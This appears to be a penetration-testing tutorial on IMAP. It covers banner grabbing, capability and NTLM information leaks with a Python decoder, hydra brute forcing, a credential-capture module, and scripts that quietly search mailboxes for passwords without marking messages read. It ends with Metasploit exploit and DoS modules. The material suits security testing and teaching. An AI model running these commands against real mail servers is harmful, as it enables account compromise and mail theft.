
IMAP Pentesting Best Practices

IMAP

IMAP usually uses ports 143 and 993.

What is IMAP?

Internet Message Access Protocol (IMAP) is the protocol a mail client uses to read and manage messages that stay stored on the mail server: folders, flags and message bodies are fetched on demand instead of being downloaded and deleted as with POP3. It is the retrieval side of email; SMTP handles delivery.


  • Port 143 - the default IMAP port; the session starts in plaintext, and the server may offer STARTTLS to upgrade it
  • Port 993 - IMAP over implicit TLS (IMAPS); the TLS handshake happens before any IMAP command, so connect with openssl s_client or another TLS-aware client
PORT     STATE SERVICE               VERSION
143/tcp  open  imap                  Dovecot imapd (Ubuntu)

IMAP Pentesting

Shodan search queries:
port:143,993
port:143 CAPABILITY
port:993 CAPABILITY
# Banner grabbing and test connection
nc -nv IP 143
# after the "* OK ..." greeting, type tagged commands; try blank/default credentials first
A1 LOGIN "root" ""
A2 LOGIN root toor
A3 LOGIN root root

nmap -p143 -sV --script=banner 192.168.x.x
nmap -p143 --script=imap-ntlm-info 192.168.x.x
msf > use auxiliary/scanner/imap/imap_version
# port 993 expects a TLS handshake first, so use openssl instead of nc/telnet there
openssl s_client -connect 192.168.x.x:993 -quiet
telnet 192.168.x.x 143


The server's replies to these queries (the greeting and, above all, the CAPABILITY response) reveal the features of the IMAP implementation: supported extensions, whether STARTTLS is offered, the SASL mechanisms advertised as AUTH=..., and whether plaintext LOGIN is refused before TLS (LOGINDISABLED).

nmap -sV --script=imap-capabilities -p143 10.10.x.x
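Added example (not code from the original post): a small Python helper that takes the raw greeting and CAPABILITY output of a session like the nc/openssl ones above and reports what a tester cares about: the server software, the SASL mechanisms offered, and whether plaintext LOGIN is still accepted on a non-TLS port. The sample responses, the finding codes and the banner table are constructed for this example; they are not captures from real hosts.

```python
import re

# Constructed sample server output, as seen after `nc host 143` / `openssl s_client`
# followed by "A1 CAPABILITY". Made-up responses, not captures from real hosts.
SAMPLES = {
    "dovecot_143": (
        "* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ "
        "STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot (Ubuntu) ready.\r\n"
    ),
    "exchange_143": (
        "* OK The Microsoft Exchange IMAP4 service is ready.\r\n"
        "* CAPABILITY IMAP4 IMAP4rev1 AUTH=NTLM AUTH=GSSAPI AUTH=PLAIN STARTTLS "
        "UIDPLUS CHILDREN IDLE NAMESPACE LITERAL+\r\n"
        "A1 OK CAPABILITY completed.\r\n"
    ),
    "hardened_143": "* OK [CAPABILITY IMAP4rev1 STARTTLS LOGINDISABLED] Dovecot ready.\r\n",
}

# Software fingerprints worth recognising in the greeting (substring -> label).
BANNERS = {"Dovecot": "Dovecot", "Microsoft Exchange": "Microsoft Exchange",
           "Courier": "Courier-IMAP", "Cyrus": "Cyrus"}


def parse_capabilities(text: str) -> set:
    """Collect capability tokens from a [CAPABILITY ...] greeting code or from an
    untagged '* CAPABILITY ...' response. Tokens are upper-cased for comparison."""
    caps = set()
    for m in re.finditer(r"\[CAPABILITY ([^\]]+)\]", text):
        caps.update(m.group(1).upper().split())
    for m in re.finditer(r"^\* CAPABILITY (.+?)\r?$", text, re.M):
        caps.update(m.group(1).upper().split())
    return caps


def assess(text: str, implicit_tls: bool = False) -> dict:
    """Turn raw greeting/CAPABILITY output into findings. implicit_tls=True means the
    output came over port 993, so the plaintext findings do not apply."""
    caps = parse_capabilities(text)
    auth = {c[5:] for c in caps if c.startswith("AUTH=")}
    software = next((label for key, label in BANNERS.items() if key in text), "unknown")
    findings = []
    if not implicit_tls:
        if "STARTTLS" not in caps:
            findings.append("NO-STARTTLS")        # no way to upgrade to TLS at all
        if "LOGINDISABLED" not in caps:
            findings.append("PLAINTEXT-LOGIN")    # LOGIN accepted before TLS: sniffable creds
        if auth & {"PLAIN", "LOGIN"}:
            findings.append("PLAINTEXT-SASL")     # base64 is not encryption
    if "NTLM" in auth:
        findings.append("NTLM-INFO-LEAK")         # Type 2 challenge reveals host/domain/OS build
    if "ID" in caps:
        findings.append("ID-EXTENSION")           # "A2 ID NIL" often returns name and version
    return {"software": software, "caps": caps, "auth": auth, "findings": findings}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        r = assess(text)
        print(f"{name:14} {r['software']:18} auth={sorted(r['auth'])} findings={r['findings']}")
```

Paste the real session output into `assess()` (with `implicit_tls=True` for a 993 session) to get the same summary for a target; a server that offers STARTTLS but not LOGINDISABLED will still happily take credentials in the clear, which is the finding most worth writing up.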


Capturing IMAP Traffic

This module runs a fake IMAP service; any client that is pointed or redirected at it and tries to log in hands over its username and password.

msf > use auxiliary/server/capture/imap

NTLM Auth - Information disclosure

If the server supports NTLM auth (typically Microsoft Exchange on Windows), the Type 2 challenge it returns during AUTHENTICATE NTLM discloses sensitive information even without valid credentials: the server's NetBIOS and DNS names and its OS version:

root@kali: telnet example.com 143 
* OK The Microsoft Exchange IMAP4 service is ready. 
>> a1 AUTHENTICATE NTLM 
+ 
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 
+ TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA

Or automate this with the nmap script imap-ntlm-info.nse (the nmap line in the banner-grabbing commands above).
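What actually leaks: the base64 after the second `+` is an NTLM CHALLENGE_MESSAGE (Type 2), and its TargetName, Version and TargetInfo fields carry the host's NetBIOS and DNS names, the OS version and a timestamp. The decoder below is an added example, not part of the original post and not the nmap script's code; it parses the two messages from the session above. Field layout and AV-pair names follow MS-NLMP; the OS family table is a lookup added for this example, and `build_negotiate` reproduces the Type 1 blob that was sent.

```python
import base64
import struct
from datetime import datetime, timedelta, timezone

# The two messages from the exchange above: the NEGOTIATE we sent, the CHALLENGE that came back.
NEGOTIATE_B64 = "TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA="
CHALLENGE_B64 = "TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA"

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE, NEGOTIATE_TARGET_INFO, NEGOTIATE_VERSION = 0x00000001, 0x00800000, 0x02000000
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
            10: "ChannelBindings"}
# Windows major.minor -> product family (the build number narrows it further).
OS_FAMILY = {(5, 1): "Windows XP", (5, 2): "Windows Server 2003", (6, 0): "Vista / Server 2008",
             (6, 1): "Windows 7 / Server 2008 R2", (6, 2): "Windows 8 / Server 2012",
             (6, 3): "Windows 8.1 / Server 2012 R2", (10, 0): "Windows 10/11 / Server 2016+"}


def build_negotiate(flags: int = 0x00088207) -> str:
    """Minimal NEGOTIATE_MESSAGE (Type 1): flags only, empty domain and workstation.
    With the default flags this reproduces the blob sent in the session above."""
    msg = SIGNATURE + struct.pack("<II", 1, flags)
    msg += struct.pack("<HHI", 0, 0, 0) * 2            # DomainNameFields, WorkstationFields
    return base64.b64encode(msg).decode()


def parse_challenge(blob: bytes) -> dict:
    """Decode a CHALLENGE_MESSAGE (Type 2) and pull out everything that identifies the host."""
    if blob[:8] != SIGNATURE or struct.unpack_from("<I", blob, 8)[0] != 2:
        raise ValueError("not an NTLM Type 2 message")
    tn_len, _tn_max, tn_off = struct.unpack_from("<HHI", blob, 12)   # TargetNameFields
    flags = struct.unpack_from("<I", blob, 20)[0]
    ti_len, _ti_max, ti_off = struct.unpack_from("<HHI", blob, 40)   # TargetInfoFields
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "cp437"
    out = {"flags": flags, "server_challenge": blob[24:32].hex(),
           "target_name": blob[tn_off:tn_off + tn_len].decode(enc), "target_info": {}}
    if flags & NEGOTIATE_VERSION:                       # Version field at offset 48
        major, minor, build = struct.unpack_from("<BBH", blob, 48)
        out["version"] = (major, minor, build)
        out["os_family"] = OS_FAMILY.get((major, minor), "unknown")
    if flags & NEGOTIATE_TARGET_INFO:                   # AV_PAIR list: id, len, value ... until EOL
        pos = ti_off
        while pos < ti_off + ti_len:
            av_id, av_len = struct.unpack_from("<HH", blob, pos)
            pos += 4
            if av_id == 0:                              # MsvAvEOL
                break
            value = blob[pos:pos + av_len]
            pos += av_len
            if av_id == 7:                              # FILETIME: 100 ns ticks since 1601-01-01
                ft = struct.unpack("<Q", value)[0]
                value = datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)
            elif av_id in (6, 8, 10):
                value = value.hex()
            else:
                value = value.decode("utf-16-le")
            out["target_info"][AV_NAMES.get(av_id, f"AvId{av_id}")] = value
    return out


def parse_challenge_b64(b64: str) -> dict:
    return parse_challenge(base64.b64decode(b64))


if __name__ == "__main__":
    assert build_negotiate() == NEGOTIATE_B64
    info = parse_challenge_b64(CHALLENGE_B64)
    print("target:", info["target_name"], "version:", info.get("version"), info.get("os_family"))
    for key, value in info["target_info"].items():
        print(f"  {key:16} {value}")
```

For the blob above this yields target name and NetBIOS/DNS names of IIS01, Windows 6.3 build 9600 (Windows 8.1 / Server 2012 R2) and the server's clock at the time of the capture, all obtained before a single password was tried.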

Brute Forcing

# Account lockout policies apply to IMAP logins too (Exchange especially): keep the list short or lower the parallelism with -t
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
# -S: use TLS (port 993), -f: stop after the first valid pair, -V: show every attempt
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f 192.168.x.x imap -V
nmap --script=imap-brute --script-args userdb=Users.list,passdb=Passwords.list -p143 192.168.x.x


Evolution

Evolution is a desktop mail client; with valid credentials it lets you browse the mailbox tree and search messages interactively instead of typing raw IMAP commands.

sudo apt install evolution


CURL

Basic mailbox navigation is possible with curl, but its IMAP documentation is light on details, so check the curl source when you need the precise URL syntax.

# -k: do not verify the (often self-signed) TLS certificate of the target
# 1. Listing mailboxes (IMAP command LIST "" "*")
$ curl -k 'imaps://10.10.x.x/' --user user:pass

# 2. Listing messages in a mailbox (IMAP commands SELECT INBOX and then SEARCH ALL)
$ curl -k 'imaps://10.10.x.x/INBOX?ALL' --user user:pass

# The result of this search is a list of message indices.
# It is also possible to provide more complex search terms, e.g. searching Drafts for "password" in the mail body:
$ curl -k 'imaps://10.10.x.x/Drafts?TEXT password' --user user:pass

# An overview of the possible search terms: https://www.atmail.com/blog/imap-commands/
# 3. Downloading a message (IMAP commands SELECT Drafts and then FETCH 1 BODY[])
$ curl -k 'imaps://10.10.x.x/Drafts;MAILINDEX=1' --user user:pass

# The mail index is the same index returned by the search operation.
# It is also possible to use the UID (unique id) to access messages, but it is less convenient since the search command has to be formatted manually, e.g.:
$ curl -k 'imaps://10.10.x.x/INBOX' -X 'UID SEARCH ALL' --user user:pass
$ curl -k 'imaps://10.10.x.x/INBOX;UID=1' --user user:pass

# It is also possible to download just parts of a message, e.g. subject and sender of the first 5 messages (-v is required to see the subject and sender):
$ curl -k 'imaps://10.10.x.x/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<'

# Although it is probably cleaner to just write a little for loop (bash):
for m in {1..5}; do
  echo $m
  curl -k "imaps://10.10.x.x/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass
done
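The same LIST / SEARCH / FETCH sequence as the curl commands above, driven from Python's imaplib, as an added example that is not part of the original post. So that it runs offline it includes a minimal fake IMAP server holding two constructed mailboxes; the domain, the user/pass pair and the message contents are made up. Point `hunt()` at a real host and port to use it against a target.

```python
import imaplib
import socket
import socketserver
import threading

# Constructed mailboxes for the in-process fake server: not real mail, not a real domain.
MAILBOXES = {
    "INBOX": [b"From: hr@corp.local\r\nSubject: Welcome aboard\r\n\r\nNothing sensitive here.\r\n"],
    "Drafts": [
        b"From: admin@corp.local\r\nSubject: vpn creds\r\nX-Mailer: draft\r\n\r\nThe VPN password is Winter2024!\r\n",
        b"From: admin@corp.local\r\nSubject: lunch\r\n\r\nPizza on Friday?\r\n",
    ],
}


class FakeIMAP(socketserver.StreamRequestHandler):
    """Just enough IMAP4rev1 to answer what hunt() sends: CAPABILITY, LOGIN, LIST,
    EXAMINE/SELECT, SEARCH (ALL or TEXT <word>), FETCH of Subject/From headers, LOGOUT."""

    def reply(self, *lines):
        self.wfile.write(b"".join(l.encode() + b"\r\n" for l in lines))

    def handle(self):
        self.reply("* OK fake IMAP4rev1 server ready")
        box = []
        while True:
            line = self.rfile.readline()
            if not line:
                return
            tag, _, rest = line.decode().rstrip("\r\n").partition(" ")
            cmd, _, args = rest.partition(" ")
            cmd = cmd.upper()
            if cmd == "CAPABILITY":
                self.reply("* CAPABILITY IMAP4rev1 LITERAL+", f"{tag} OK done")
            elif cmd == "LOGIN":                                    # lab box: any credentials work
                self.reply(f"{tag} OK logged in")
            elif cmd == "LIST":
                self.reply(*[f'* LIST (\\HasNoChildren) "/" "{n}"' for n in MAILBOXES], f"{tag} OK done")
            elif cmd in ("SELECT", "EXAMINE"):
                box = MAILBOXES[args.strip('"')]
                self.reply(f"* {len(box)} EXISTS", f"{tag} OK done")
            elif cmd == "SEARCH":
                term = args.split(" ", 1)[1].lower().encode() if args.upper().startswith("TEXT ") else b""
                hits = [str(i) for i, m in enumerate(box, 1) if term in m.lower()]
                self.reply(("* SEARCH " + " ".join(hits)).rstrip(), f"{tag} OK done")
            elif cmd == "FETCH":                                    # sequence set "n" or "a:b"
                lo, _, hi = args.split(" ", 1)[0].partition(":")
                for i in range(int(lo), (len(box) if hi == "*" else int(hi or lo)) + 1):
                    head = box[i - 1].split(b"\r\n\r\n")[0].split(b"\r\n")
                    hdr = b"".join(h + b"\r\n" for h in head
                                   if h.lower().startswith((b"subject:", b"from:"))) + b"\r\n"
                    # {N} is the IMAP literal syntax servers use to return header/body data
                    self.wfile.write(f"* {i} FETCH (BODY[HEADER.FIELDS (SUBJECT FROM)] {{{len(hdr)}}}\r\n".encode()
                                     + hdr + b")\r\n")
                self.reply(f"{tag} OK done")
            elif cmd == "LOGOUT":
                self.reply("* BYE", f"{tag} OK done")
                return
            else:
                self.reply(f"{tag} BAD unsupported")


def hunt(host, port, user, password, term="password"):
    """LIST -> EXAMINE every mailbox -> SEARCH TEXT <term> -> FETCH Subject/From of each hit.
    Returns {mailbox: [header block, ...]} for mailboxes with at least one hit."""
    conn = imaplib.IMAP4(host, port)
    conn.login(user, password)
    found = {}
    _, boxes = conn.list()                                  # b'(\\HasNoChildren) "/" "INBOX"'
    for raw in boxes:
        name = raw.decode().rsplit(" ", 1)[1].strip('"')
        conn.select(name, readonly=True)                    # EXAMINE: reads do not set \Seen
        _, data = conn.search(None, "TEXT", term)           # b'1 4', or b'' when nothing matches
        for msg_id in data[0].split():
            _, parts = conn.fetch(msg_id, "(BODY.PEEK[HEADER.FIELDS (SUBJECT FROM)])")
            found.setdefault(name, []).append(parts[0][1].decode().strip())
    conn.logout()
    return found


def run_demo(term="password"):
    """Start the fake server on a random loopback port, run hunt() against it, stop it."""
    server = socketserver.TCPServer(("127.0.0.1", 0), FakeIMAP)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    socket.setdefaulttimeout(5)                             # fail fast instead of hanging
    try:
        return hunt("127.0.0.1", server.server_address[1], "user", "pass", term)
    finally:
        socket.setdefaulttimeout(None)
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for mailbox, headers in run_demo().items():
        print(mailbox, headers)
```

EXAMINE and BODY.PEEK are used instead of SELECT and BODY so that reading through a target's mailbox does not flip messages to \Seen, which is the kind of trace a mailbox owner notices; against a real server, swap the fake for `hunt(host, 143, user, password)` (or `imaplib.IMAP4_SSL` for 993).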

IMAP Vulnerabilities

# Eudora / Qualcomm WorldMail 3.0 IMAPD LIST buffer overflow [CVE-2005-4267]
msf > use exploit/windows/imap/eudora_list
# IMAP fuzzer: sends malformed commands and is likely to crash the service, so not for production targets
msf > use auxiliary/dos/windows/imap/fuzz_imap
This post is licensed under CC BY 4.0 by the author.


Powered by 0xhav0c © 2022